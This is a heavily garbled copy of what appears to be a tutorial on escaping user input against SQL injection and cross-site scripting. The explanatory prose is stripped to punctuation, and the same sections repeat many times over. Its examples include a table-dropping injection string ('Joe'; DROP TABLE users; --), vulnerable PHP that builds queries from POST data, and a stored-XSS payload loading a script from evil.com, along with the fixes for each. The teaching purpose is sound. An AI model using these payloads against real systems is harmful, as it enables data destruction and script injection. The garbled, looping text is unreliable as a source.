$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

